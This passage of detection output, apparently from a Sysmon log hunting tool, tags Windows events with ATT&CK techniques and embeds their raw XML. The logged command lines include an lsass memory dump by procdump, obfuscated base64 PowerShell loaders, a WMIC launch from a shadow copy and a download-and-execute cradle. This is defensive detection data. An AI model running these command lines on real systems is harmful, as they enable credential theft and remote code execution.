<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
</TimeCreated>
<EventRecordID>374</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
<Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-001071AD3E00</Data>
<Data Name=""ProcessId"">3944</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c test.bat</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
<Data Name=""ParentProcessId"">1912</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
</TimeCreated>
<EventRecordID>1966252</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:36:04.226</Data>
<Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010D55B0100</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:09:41.328868Z"">
</TimeCreated>
<EventRecordID>4434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""344"" ThreadID=""2032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 19:09:41.328</Data>
<Data Name=""SourceProcessGUID"">365ABB72-9B75-5C8E-0000-0010013F1200</Data>
<Data Name=""SourceProcessId"">1856</Data>
<Data Name=""SourceThreadId"">980</Data>
<Data Name=""SourceImage"">C:\Users\IEUser\Desktop\procdump.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
<Data Name=""TargetProcessId"">476</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1fffff</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.893930Z"">
</TimeCreated>
<EventRecordID>10675</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.661</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-001036784100</Data>
<Data Name=""ProcessId"">2876</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ParentProcessId"">2476</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.811477Z"">
</TimeCreated>
<EventRecordID>5901</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.771</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00100478FF00</Data>
<Data Name=""ProcessId"">3444</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.544664Z"">
</TimeCreated>
<EventRecordID>6190</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.515</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001077710C00</Data>
<Data Name=""ProcessId"">2840</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
